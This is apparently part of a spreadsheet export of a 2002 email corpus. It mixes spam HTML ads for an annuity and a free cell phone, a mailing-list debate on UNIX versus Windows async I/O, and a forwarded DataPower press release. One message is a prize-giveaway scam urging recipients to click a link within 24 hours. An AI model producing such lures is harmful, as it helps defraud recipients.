                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#663300"&gt;&lt;b&gt;&lt;font size=3D"2" color=3D"#FFFFFF"&gt;Please fill =
 out the form below for more information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20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&lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"info@safeharborfinancial.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Safe Harbor Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/sh/20011226-8.gif" =
 width=3D"540" height=3D"117" alt=3D"Safe Harbor Financial, In. =
 www.SafeHarborFinancial.com"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr bgcolor=3D"#FFCC33"&gt;=20
           &lt;td colspan=3D"3"&gt;&lt;font size=3D"1"&gt;&lt;b&gt;FOR AGENT USE ONLY. NOT =
 INTENDED FOR=20
             CONSUMER SOLICITATION PURPOSES. &lt;/b&gt;The Market Choice =
 III(sm) annuity=20
             is issued on form series LC115 (group) and LS115A =
 (individual), and=20
             state variations by North American Company for Life and =
 Health Insurance,=20
             Chicago, Illinois. This product and its features may not be =
 available=20
             in all states. &amp;quot;Dow Jones&amp;quot;, &amp;quot;Dow Jones =
 Industrial Average=20
             (sm)&amp;quot; and &amp;quot;DJIA(sm)&amp;quot; are service marks of Dow =
 Jones=20
             and Company, Inc. and have been licensed for use for certain =
 purposes=20
             by North American Company. Russell 2000 Index is a trademark =
 of Frank=20
             Russell Company and has been licensed for use by North =
 American Company.=20
             &amp;quot;Standard &amp;amp; Poor's&amp;reg;&amp;quot;, =
 &amp;quot;S&amp;amp;P&amp;reg;&amp;quot;,=20
             &amp;quot;S&amp;amp;P 500&amp;reg;&amp;quot;, &amp;quot;Standard &amp;amp; Poor's =
 500 Index&amp;reg;&amp;quot;,=20
             &amp;quot;S&amp;amp;P MidCap 400 Index&amp;reg;&amp;quot; and &amp;quot;Standard =
 &amp;amp;=20
             Poor's MidCap 400 Index&amp;reg;&amp;quot; are trademarks of the =
 McGraw-Hill=20
             Companies, Inc. and have been licensed for use by North =
 American Company.=20
             The NASDAQ-100&amp;reg;, NASDAQ-100 INDEX&amp;reg; and NASDAQ&amp;reg; =
 are registered=20
             marks of the NASDAQ Stock Market Inc. (which with its =
 affiliates are=20
             the &amp;quot;Corporations&amp;quot;) and are licensed for use by =
 North American=20
             Company. The Market Choice III(sm) annuities are not issued, =
 endorsed,=20
             sold or promoted by the Corporations or any of the Indexes =
 listed=20
             above. THE CORPORATIONS MAKE NO WARRANTIES AND BEAR NO =
 LIABILITY WITH=20
             RESPECT TO THE MARKET CHOICE III(sm). *Commissions are based =
 upon=20
             rates as of 5/1/02. Commissions may vary by state and are =
 subject=20
             to change. **Participation rates are based upon rates as of =
 7/3/02=20
             and are subject to change. Participation rate is based on =
 the S&amp;amp;P=20
             500&amp;reg; and DJIA(sm) and the Daily Average Crediting =
 Method. Call=20
             Safe Harbor for additional details on other indexes and =
 participation=20
             rates. &lt;sup&gt;1&lt;/sup&gt;NASDAQ-100&amp;reg; is available on the =
 Point-to-Point=20
             Index Crediting Option only. &lt;sup&gt;2&lt;/sup&gt;Contracting Bonus =
 will be=20
             paid once contracting with Safe Harbor is complete and =
 formal.&lt;br&gt;
             NDF-8079Z-ADII-421 Prt. 7/02 Exp. 9/15/2002&lt;/font&gt;&lt;/td&gt;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size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_10CEB1_01C2319D.21A2F770--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Gasp!
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 1 Sep 2002, Bill Stoddard wrote:
 &gt; &gt;
 &gt; &gt; "Red Hat Linux Advanced Server provides many high end features such as:
 &gt; &gt; Support for Asynchronous I/O. Now read I/O no longer needs to stall your
 &gt; &gt; application while waiting for completion."
 &gt;
 &gt; Can you provide a reference?  I could find it myself but I'm too lazy.
 Well, i saw it on the Compaq Testdrive site, then had to seriously dig on
 the redhat site... It's in one of their whitepapers...
 http://www.redhat.com/pdf/as/as_rasm.pdf
 &gt; &gt; Could it be? After 20 years without this feature UNIX finally
 &gt; &gt; catches up to
 &gt; &gt; Windows and has I/O that doesnt totally suck for nontrivial apps? No way!
 &gt;
 &gt; Do /dev/poll and FreeBSD's KQ event driven APIs count? IMHO, true async
 &gt; io as implemented by Windows 4.0 and beyond is pretty slick, but the
 &gt; programming model is substantially more complex than programming to an
 &gt; event API like /dev/poll. And true async does not buy much if the
 &gt; system call overhead is low (as it is with Linux).
 I havent used the FBSD poll, as it's not portable, select and poll(still not
 100%) are all that exist in the UNIX world. Redhat of course doesnt count as
 portable either, but it's nice they are trying. The Windows I/O model does
 definately blow the doors off the UNIX one, but then they had select to
 point at in it's suckiness and anything would have been an improvement. UNIX
 is just now looking at it's I/O model and adapting to a multiprocess
 multithreaded world so it's gonna be years yet before a posix API comes out
 of it. Bottom line is the "do stuff when something happens" model turned out
 to be right, and the UNIX "look for something to do and keep looking till
 you find it no matter how many times you have to look" is not really working
 so great anymore.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: DataPower announces XML-in-silicon
</t>
  </si>
  <si>
    <t xml:space="preserve">If it's not stateful, it wouldn't seem to be worth the effort, although I guess it might help with DDoS attacks.
 Sounds snake-oilish to me, but I'm biased by lots of experience with firewalls and proxy servers, and the limitations thereof.
 Ken
 &gt; -----Original Message-----
 &gt; From: Rohit Khare [mailto:khare@alumni.caltech.edu]
 &gt; Sent: Tuesday, August 27, 2002 5:00 PM
 &gt; To: fork@example.com
 &gt; Subject: DataPower announces XML-in-silicon
 &gt; 
 &gt; 
 &gt; No analysis yet... don't know what to make of it yet. But 
 &gt; here's the raw 
 &gt; bits for all to peruse and check out what's really going on... Best, 
 &gt; Rohit
 &gt; 
 &gt; ===========================================================
 &gt; 
 &gt; DataPower delivers XML acceleration device
 &gt; ByScott Tyler Shafer
 &gt; August 27, 2002 5:46 am PT
 &gt; 
 &gt; DATAPOWER TECHNOLOGY ON Monday unveiled its network device designed 
 &gt; specifically to process XML data. Unlike competing solutions that 
 &gt; process XML data in software, DataPower's device processes 
 &gt; the data in 
 &gt; hardware -- a technology achievement that provides greater 
 &gt; performance, 
 &gt; according to company officials.
 &gt; 
 &gt; The new device, dubbed DataPower XA35 XML Accelerator, is the 
 &gt; first in a 
 &gt; family of products expected from the Cambridge, Mass.-based 
 &gt; startup. The 
 &gt; DataPower family is based on a proprietary processing core technology 
 &gt; called XG3 that does the analysis, parsing, and processing of the XML 
 &gt; data.
 &gt; 
 &gt; According to Steve Kelly, CEO of DataPower, the XA35 Accelerator was 
 &gt; conceived to meet the steady adoption of XML, the anticipated future 
 &gt; proliferation of Web services, and as a means to share data 
 &gt; between two 
 &gt; businesses.
 &gt; 
 &gt; "Our vision is to build out an XML-aware infrastructure," Kelly said. 
 &gt; "The XA35 is the first of a family."
 &gt; 
 &gt; Kelly explained that converting data into XML increases the 
 &gt; file size up 
 &gt; to 20 times. This, he said, makes processing the data very taxing on 
 &gt; application servers; DataPower believes an inline device is the best 
 &gt; alternative.
 &gt; 
 &gt; In addition to the large file sizes, security is also of paramount 
 &gt; importance in the world of XML.
 &gt; 
 &gt; "Today's firewalls are designed to inspect HTTP traffic only," Kelly 
 &gt; said. "A SOAP packet with XML will go straight through a firewall. 
 &gt; Firewalls are blind to XML today."
 &gt; 
 &gt; Future products in DataPowers family will focus more specifically on 
 &gt; security, especially as Web services proliferate, Kelly said.
 &gt; 
 &gt; According to DataPower, most existing solutions to offload XML 
 &gt; processing are homegrown and done in software -- an approach 
 &gt; the company 
 &gt; itself tried initially and found to be inadequate with 
 &gt; regards to speed 
 &gt; and security. After trying the software path, the company turned to 
 &gt; creating a solution that would process XML in hardware.
 &gt; 
 &gt; "Our XG3 execution core converts XML to machine code," said Kelly, 
 &gt; adding that to his knowledge no other company's solution does. Kelly 
 &gt; said in the next few months he expects the market to be flooded with 
 &gt; technologies that claim to do XML processing -- claims that 
 &gt; he believes 
 &gt; will be mostly false.
 &gt; Other content-aware switches, such as SSL (secure socket layer) 
 &gt; accelerators and load balancers, look at the first 64 bytes 
 &gt; of a packet, 
 &gt; while the XA35 provides deeper packet inspection, looking at 
 &gt; 1,400 bytes 
 &gt; and thus enabling greater processing of XML data, Kelly explained.
 &gt; 
 &gt; The 1U-high network device has been tested against a large 
 &gt; collection of 
 &gt; XML and XSL data types and can learn new flavors of the 
 &gt; markup language 
 &gt; as they pass through the device.
 &gt; 
 &gt; The XA35 can be deployed in proxy mode behind a firewall and a load 
 &gt; balancer, and it will inspect all traffic that passes and 
 &gt; will identify 
 &gt; and process those packets that are XML, Kelly said.
 &gt; 
 &gt; In addition to proxy mode, the device can also be used as an 
 &gt; application 
 &gt; co-processor. This deployment method gives administrators 
 &gt; more granular 
 &gt; control over what data is inspected and the application server itself 
 &gt; controls the device.
 &gt; 
 &gt; DataPower is not the only company chasing this emerging 
 &gt; market. Startup 
 &gt; Sarvega, based in Burr Ridge, Ill., introduced the Sarvega 
 &gt; XPE switch in 
 &gt; May, and earlier this month Tarari, an Intel spin-off, 
 &gt; launched with a 
 &gt; focus on content processing and acceleration.
 &gt; The DataPower device is now available, priced starting at 
 &gt; $54,995. The 
 &gt; company has announced one customer to date and says the product is in 
 &gt; field trails at a number of other enterprises.
 &gt; 
 &gt; ==============================================================
 &gt; ===========
 &gt; 
 &gt; DataPower has been addressing enterprise networking needs 
 &gt; since it was 
 &gt; founded in early 1999 by Eugene Kuznetsov, a technology visionary who 
 &gt; foresaw the adverse effects XML and other next generation protocols 
 &gt; would have on enterprise networks. Long before industry 
 &gt; interest in XML 
 &gt; grew, Kuznetsov assembled a team of world-class M.I.T. engineers and 
 &gt; designed the industry's first solutions to address the unique 
 &gt; requirements for processing XML. The first such solution was 
 &gt; a software 
 &gt; interpreter called DGXT. This software-based approach to XML 
 &gt; processing 
 &gt; is still licensed by many companies for use in their own 
 &gt; products today.
 &gt; 
 &gt; Leveraging the detailed knowledge and customer experience gained from 
 &gt; developing software-based accelerators, Kuznetsov's team 
 &gt; raised the bar 
 &gt; and designed a system for processing XML in purpose-built 
 &gt; hardware. In 
 &gt; 2001, DataPower's effort produced XML Generation Three (XG3), the 
 &gt; industry's fastest technology for XML processing, bar none.
 &gt; 
 &gt; Today, XG3 technology powers the industry's first wire-speed XML 
 &gt; network devices, enabling secure, high-speed applications and XML Web 
 &gt; Services. While other companies are just now marketing first 
 &gt; versions of 
 &gt; products, DataPower is delivering its third generation of technology, 
 &gt; providing an immediate return on technology investments to 
 &gt; industry-leading customers and partners.
 &gt; 
 &gt; DataPower's M.I.T. heritage is complemented by a management team that 
 &gt; brings decades of experience in the networking and computing 
 &gt; industries, 
 &gt; drawing veteran leaders from several successful companies including 
 &gt; Akamai, Argon, Cascade, Castle Networks, Sycamore and Wellfleet.
 &gt; 
 &gt; ==============================================================
 &gt; ===========
 &gt; 
 &gt; DataPower Technology Secures $9.5 Million in Funding
 &gt; 
 &gt; Venrock Associates, Mobius Venture Capital and Seed Capital 
 &gt; Back Pioneer 
 &gt; in XML-Aware Networking for Web Services
 &gt; 
 &gt; CAMBRIDGE, Mass. - July 8, 2002 - DataPower Technology, Inc., the 
 &gt; leading provider of XML-Aware network infrastructure, today announced 
 &gt; that it has secured $9.5 million in series B financing. Investors for 
 &gt; this round include Venrock Associates, Mobius Venture Capital 
 &gt; and Seed 
 &gt; Capital Partners. Michael Tyrrell, of Venrock, Bill Burnham, 
 &gt; of Mobius, 
 &gt; and Jeff Fagnan, of Seed Capital, have joined DataPowers Board of 
 &gt; Directors.
 &gt; 
 &gt; DataPower will use this funding to accelerate development, 
 &gt; marketing and 
 &gt; sales of the companys breakthrough technology for XML-Aware 
 &gt; networking. 
 &gt; Founded in 1999, DataPower invented the worlds first intelligent XML 
 &gt; networkingdevices, capable of transforming XML traffic and 
 &gt; transactions 
 &gt; at the wire-speed enterprises need to effectively embrace Web 
 &gt; services 
 &gt; and other XML-centric initiatives. DataPowers solutions are based on 
 &gt; its patent-pending XML Generation Three (XG3) technology.
 &gt; 
 &gt; "Enterprises are adopting XML at rapid rate to facilitate inter-and 
 &gt; intra-company communications but their network infrastructure is ill 
 &gt; prepared to support the requirements of this new traffic type. 
 &gt; DataPowers XML-acceleration devices enable the wirespeed 
 &gt; processing of 
 &gt; XML that is required to support next generation enterprise 
 &gt; applications," said Eugene Kuznetsov, CTO and founder of DataPower 
 &gt; Technology.
 &gt; 
 &gt; "DataPower gives companies the ability to use XML thats 
 &gt; critical to Web 
 &gt; services projects without sacrificing an ounce of 
 &gt; performance." A single 
 &gt; DataPower acceleration engine delivers the processing power of 10 
 &gt; serversbreaking the performance bottleneck associated with XML 
 &gt; processing and delivering an extraordinary return on investment. In 
 &gt; addition, the DataPower platform provides enhanced XML security, 
 &gt; protection against XML-based denial-of-service attacks, connection of 
 &gt; e-business protocols for incompatible XML data streams, load 
 &gt; balancing 
 &gt; between back-end servers and real-time statistics reports.
 &gt; 
 &gt; "In the post-bubble economy, technology investment decisions require 
 &gt; laser-focused scrutiny. DataPowers patent-pending technology 
 &gt; addresses 
 &gt; a very real and growing pain point for enterprises," said Michael 
 &gt; Tyrrell of Venrock Associates. "By turbo-charging their networks with 
 &gt; DataPowers unique XML-Aware networking technology, companies will be 
 &gt; free to adopt next generation Web services without encountering 
 &gt; performance and security pitfalls."
 &gt; 
 &gt; "We looked long and hard for a company capable of addressing 
 &gt; the rapidly 
 &gt; growing problems surrounding XML message processing performance and 
 &gt; security," said Bill Burnham of Mobius Venture Capital. 
 &gt; "DataPower is on 
 &gt; their third generation of technology. Their patent pending XML 
 &gt; Generation Three (XG3)technology was quite simply the single most 
 &gt; compelling technology solution we have seen to date."
 &gt; 
 &gt; "XML is not a nice-to-have, it is a must have for enterprises serious 
 &gt; about optimizing application efficiency. Since 1999, 
 &gt; DataPower has been 
 &gt; developing solutions to facilitate enterprise use of XML and Web 
 &gt; services," said Jeff Fagnan of Seed Capital Partners. "DataPowers 
 &gt; XML-acceleration devices are a key requirement for 
 &gt; enterprises that rely 
 &gt; on XML for mission critical applications."
 &gt; 
 &gt; About Venrock Associates
 &gt; Venrock Associates was founded as the venture capital arm of the 
 &gt; Rockefeller Family and continues a tradition of funding entrepreneurs 
 &gt; that now spans over seven decades. Laurance S. Rockefeller pioneered 
 &gt; early stage venture financing in the 1930s. With over 300 investments 
 &gt; over a span of more than 70 years, the firm has an 
 &gt; established a track 
 &gt; record of identifying and supporting promising early stage, 
 &gt; technology- 
 &gt; based enterprises. As one of most experienced venture firms in the 
 &gt; United States, Venrock maintains a tradition of collaboration with 
 &gt; talented entrepreneurs to establish successful, enduring companies. 
 &gt; Venrock's continuing goal is to create long-term value by assisting 
 &gt; entrepreneurs in building companies from the formative stages. Their 
 &gt; consistent focus on Information Technology and Life Sciences-related 
 &gt; opportunities provides a reservoir of knowledge and a network of 
 &gt; contacts that have proven to be a catalyst for the growth of 
 &gt; developing 
 &gt; organizations. Venrock's investments have included CheckPoint 
 &gt; Software, 
 &gt; USinternetworking, Caliper Technologies, Illumina, Niku, DoubleClick, 
 &gt; Media Metrix, 3COM, Intel, and Apple Computer. With offices 
 &gt; in New York 
 &gt; City, Cambridge, MA, and Menlo Park, CA, Venrock is well 
 &gt; positioned to 
 &gt; respond to opportunities in any locale. For more information 
 &gt; on Venrock 
 &gt; Associates, please visit www.venrock.com
 &gt; 
 &gt; About Mobius Venture Capital
 &gt; Mobius Venture Capital, formerly SOFTBANK Venture Capital, is a $2.5 
 &gt; billion U.S.-based private equity venture capital firm managed by an 
 &gt; unparalleled team of former CEOs and entrepreneurs, 
 &gt; technology pioneers, 
 &gt; senior executives from major technology corporations, and 
 &gt; leaders from 
 &gt; the investment banking community. Mobius Venture Capital specializes 
 &gt; primarily in early-stage investments in the areas of: communications 
 &gt; systems software and services; infrastructure software and services; 
 &gt; professional services; enterprise applications; healthcare 
 &gt; informatics; 
 &gt; consumer and small business applications; components; and emerging 
 &gt; technologies. Mobius Venture Capital combines its technology 
 &gt; expertise 
 &gt; and broad financial assets with the industry's best entrepreneurs to 
 &gt; create a powerhouse portfolio of over 100 of the world's leading high 
 &gt; technology companies. Mobius Venture Capital can be contacted by 
 &gt; visiting their web site www.mobiusvc.com.
 &gt; 
 &gt; About Seed Capital Partners
 &gt; Seed Capital Partners is an early-stage venture fund affiliated with 
 &gt; SoftBank Corporation, one of the world's leading Internet 
 &gt; market forces. 
 &gt; Seed Capital manages funds focused primarily on companies addressing 
 &gt; Internet-enabled business-to-business digital information technology 
 &gt; opportunities, which are located in the Northeastern U.S., the 
 &gt; southeastern region of the Province of Ontario, Canada, and 
 &gt; Israel. Seed 
 &gt; Capitals portfolio includes Spearhead Technologies, 
 &gt; Concentric Visions 
 &gt; and CompanyDNA. For more information on Seed Capital Partners, please 
 &gt; visit www.seedcp.com.
 &gt; 
 &gt; About DataPower Technology
 &gt; DataPower Technology provides enterprises with intelligent XML-Aware 
 &gt; network infrastructure to ensure unparalleled performance, 
 &gt; security and 
 &gt; manageability of next-generation protocols. DataPowers 
 &gt; patent-pending 
 &gt; XML Generation Three (XG3) technology powers the industrys first 
 &gt; wirespeed XML network devices, enabling secure, high-speed 
 &gt; applications 
 &gt; and XML Web Services. Founded in 1999, DataPower is now 
 &gt; delivering its 
 &gt; third generation of technology, providing immediate return on 
 &gt; technology 
 &gt; investments to industry-leading customers and partners. DataPower is 
 &gt; privately held and based in Cambridge, MA. Investors include Mobius 
 &gt; Venture Capital, Seed Capital Partners, and Venrock Associates.
 &gt; 
 &gt; CONTACT:
 &gt; 
 &gt; DataPower Technology, Inc.
 &gt; Kieran Taylor
 &gt; 617-864-0455
 &gt; kieran@datapower.com
 &gt; 
 &gt; Schwartz Communications
 &gt; John Moran/Heather Chichakly
 &gt; 781-684-0770
 &gt; datapower@schwartz-pr.com
 &gt; 
 &gt; ==============================================================
 &gt; ==========
 &gt; 
 &gt; Steve Kelly, chairman and CEO
 &gt; 
 &gt; During over twenty years in the technology industry, Steve Kelly has 
 &gt; built and managed global enterprise networks, provided consulting 
 &gt; services to Fortune 50 businesses, and been involved in the launch of 
 &gt; several start-ups. Prior to DataPower, Kelly was an 
 &gt; entrepreneur-in-residence at Venrock Associates, and was 
 &gt; co-founder of 
 &gt; Castle Networks, where he led the company's sales, service 
 &gt; and marketing 
 &gt; functions. Castle was acquired by Siemens AG in 1999 to 
 &gt; create Unisphere 
 &gt; Networks, which was subsequently purchased by Juniper Networks. Kelly 
 &gt; was an early contributor at Cascade Communications, where he 
 &gt; built and 
 &gt; managed the company's core switching business; Cascade's 
 &gt; annual revenues 
 &gt; grew from $2 million to $300 million annually during Kelly's tenure. 
 &gt; Kelly also worked at Digital Equipment Corporation where he 
 &gt; managed and 
 &gt; grew their corporate network to 50,000+ nodes in 28 countries, the 
 &gt; largest in the world at the time. Kelly has a B.S. in Information 
 &gt; Systems from Bentley College.
 &gt; 
 &gt; Eugene Kuznetsov, founder, president and CTO
 &gt; 
 &gt; Eugene Kuznetsov is a technology visionary that has been working to 
 &gt; address enterprise XML issues since the late 90s. Kuznetsov founded 
 &gt; DataPower Technology, Inc. in 1999 to provide enterprises with an 
 &gt; intelligent, XML-aware network infrastructure to support 
 &gt; next-generation 
 &gt; applications. Prior to starting DataPower, Kuznetsov led the Java JIT 
 &gt; Compiler effort for Microsoft Internet Explorer for Macintosh 4.0. He 
 &gt; was also part of the team which developed one of the first clean room 
 &gt; Java VM's. This high-speed runtime technology was licensed by some of 
 &gt; the industry's largest technology companies, including Apple 
 &gt; Computer. 
 &gt; He has consulted to numerous companies and worked on a variety of 
 &gt; hardware and software engineering problems in the areas of memory 
 &gt; management, power electronics, optimized execution engines and 
 &gt; application integration. Kuznetsov holds a B.S. in electrical 
 &gt; engineering from MIT.
 &gt; 
 &gt; Steve Willis, vice president of advanced technology
 &gt; 
 &gt; Steve Willis is an accomplished entrepreneur and a pioneer in 
 &gt; protocol 
 &gt; optimization. Prior to joining DataPower, Willis was 
 &gt; co-founder and CTO 
 &gt; of Argon Networks, a provider of high-performance switching 
 &gt; routers that 
 &gt; was acquired by Siemens AG in 1999 to create Unisphere Networks; 
 &gt; Unisphere was subsequently purchased by Juniper Networks. 
 &gt; Before Argon, 
 &gt; Steve was vice president of advanced technology at Bay Networks (now 
 &gt; Nortel Networks) where he led both IP and ATM-related technology 
 &gt; development and managed a group that generated 24 patent 
 &gt; applications, 
 &gt; developed a 1 Mbps forwarding engine and led the specification of the 
 &gt; ATM Forum's PNNI routing protocol. Most notably, Steve was 
 &gt; co-founder, 
 &gt; original software director and architect for Wellfleet 
 &gt; Communications, a 
 &gt; leading pioneer of multi-protocol routers. Wellfleet was rated as the 
 &gt; fastest growing company in the U.S. for two consecutive years 
 &gt; by Fortune 
 &gt; magazine. Willis is currently a member of the Institute of Electrical 
 &gt; and Electronics Engineers (IEEE) and the Internet Research Task Force 
 &gt; (IRTF) Routing Research Group. Willis has a B.D.I.C. in 
 &gt; Computer Science 
 &gt; from the University of Massachusetts.
 &gt; 
 &gt; Bill Tao, vice president of engineering
 &gt; 
 &gt; With a vast understanding of network optimization technologies and 
 &gt; extensive experience in LAN and WAN networking, Bill Tao 
 &gt; brings over 25 
 &gt; years of critical knowledge to lead DataPower's engineering efforts. 
 &gt; Prior to DataPower, Tao was the vice president of engineering for 
 &gt; Sycamore Networks, developing a family of metro/regional 
 &gt; optical network 
 &gt; switches. He is also well acquainted with network optimization 
 &gt; techniques as he was previously vice president of engineering at 
 &gt; InfoLibria, where he led development and software quality assurance 
 &gt; engineering for a family of network caching products. Tao has held 
 &gt; senior engineering positions at NetEdge, Proteon, Codex and Wang. Tao 
 &gt; received a B.S. in Electrical Engineering from the University of 
 &gt; Connecticut and an M.S. in Computer Science from the University of 
 &gt; Illinois.
 &gt; 
 &gt; Kieran Taylor, director of product marketing
 &gt; 
 &gt; Kieran Taylor has an accomplished record as a marketing professional, 
 &gt; industry analyst and journalist. Prior to joining DataPower, 
 &gt; Taylor was 
 &gt; the director of product management and marketing for Akamai 
 &gt; Technologies 
 &gt; (NASDAQ: AKAM). As an early contributor at Akamai, he helped 
 &gt; develop the 
 &gt; company's initial positioning and led the technical development and 
 &gt; go-to-market activities for Akamai's flagship EdgeSuite service. 
 &gt; Taylor's early contribution helped position the service provider to 
 &gt; secure a $12.6 billion IPO. He has also held senior marketing 
 &gt; management 
 &gt; positions at Nortel Networks, Inc. and Bay Networks. Taylor was 
 &gt; previously an analyst at TeleChoice, Inc. and the Wide Area Networks 
 &gt; editor for Data Communications, a McGraw Hill publication. 
 &gt; Taylor holds 
 &gt; a B.A. in Print Journalism from the Pennsylvania State 
 &gt; University School 
 &gt; of Communications.
 &gt; 
 &gt; =================================================================
 &gt; Board of Advisors
 &gt; 
 &gt; Mark Hoover
 &gt; Mark Hoover is President and co-founder of Acuitive, Inc., a start-up 
 &gt; accelerator. With over 20 years experience in the networking 
 &gt; industry, 
 &gt; Hoover's expertise spans product development, marketing, and business 
 &gt; development. Before launching Acuitive, Hoover worked at AT&amp;T Bell 
 &gt; Laboratories, AT&amp;T Computer Systems, SynOptics, and Bay 
 &gt; Networks, where 
 &gt; he played a role in the development of key technologies, such as 
 &gt; 10-BASET, routing, FDDI, ATM, Ethernet switching, firewall, Internet 
 &gt; traffic management, and edge WAN switch industries.
 &gt; 
 &gt; George Kassabgi
 &gt; Currently Vice President of Engineering at BEA Systems, Mr. 
 &gt; Kassabgi has 
 &gt; held executive-level positions in engineering, sales and 
 &gt; marketing, and 
 &gt; has spearheaded leading-edge developments in the application server 
 &gt; marketplace since 1996. He is widely known for his regular speaking 
 &gt; engagements at JavaOne, as well as columns and contributions 
 &gt; in JavaPro, 
 &gt; Java Developer's Journal and other publications. In addition 
 &gt; to being a 
 &gt; venerated Java expert, George Kassabgi holds a patent on SmartObject 
 &gt; Technology, and authored the technical book Progress V8.
 &gt; 
 &gt; Marshall T. Rose
 &gt; Marshall T. Rose runs his own firm, Dover Beach Consulting, Inc. He 
 &gt; formerly held the position of the Internet Engineering Task 
 &gt; Force (IETF) 
 &gt; Area Director for Network Management, one of a dozen individuals who 
 &gt; oversaw the Internet's standardization process. Rose is the author of 
 &gt; several professional texts on subjects such as Internet Management, 
 &gt; Electronic Mail, and Directory Services, which have been published in 
 &gt; four languages. He is well known for his implementations of core 
 &gt; Internet technologies (such as POP, SMTP, and SNMP) and OSI 
 &gt; technologies 
 &gt; (such as X.500 and FTAM). Rose received a PhD in Information and 
 &gt; Computer Science from the University of California, Irvine, in 1984.
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 You have been specially selected to qualify for the following:
 Premium Vacation Package and Pentium PC Giveaway
 To review the details of the please click on the link 
 with the confirmation number below:
 http://wintrip.www78.cn4e.com
 Confirmation Number#Lh340
 Please confirm your entry within 24 hours of receipt of this confirmation.
 Wishing you a fun filled vacation!
 If you should have any additional questions or cann't connect to the site 
 do not hesitate to contact me direct:
 mailto:vacation@btamail.net.cn?subject=Help!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Early Start and Peter Gabriel
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000200.html
 Date: 2002-09-29T10:59:19-08:00
 Strangely, I managed to get up before 9am (on a Sunday!) without the aid of an 
 alarm clock. Not sure how that happened. I had some breakfast (muffin with 
 jelly and peanut butter, and strawberry drink) while catching up on...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FREE Cell Phone + $50 Cash Back!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;FREE Motorola Cell Phone with $50 Cash Back!&lt;/TITLE&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;
 &lt;TABLE align="center" border=0 cellPadding=0 cellSpacing=0 width=450&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;IMG height=1 src="images/spacer.gif" width=185&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="images/spacer.gif" width=65&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="images/spacer.gif" width=50&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;IMG height=1 src="images/spacer.gif" width=150&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=2 rowSpan=2&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0
       height=150
       src="http://168.143.181.42/htmlemails/images/T193no_option_01.gif"
       width=250&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD rowSpan=2&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0
       height=150
       src="http://168.143.181.42/htmlemails/images/T193no_option_02.gif"
       width=50&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=QBFUIEXORXKL&amp;ext=1"&gt;&lt;IMG border=0 height=100
       src="http://168.143.181.42/htmlemails/images/T193no_option_03.gif"
       width=150&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
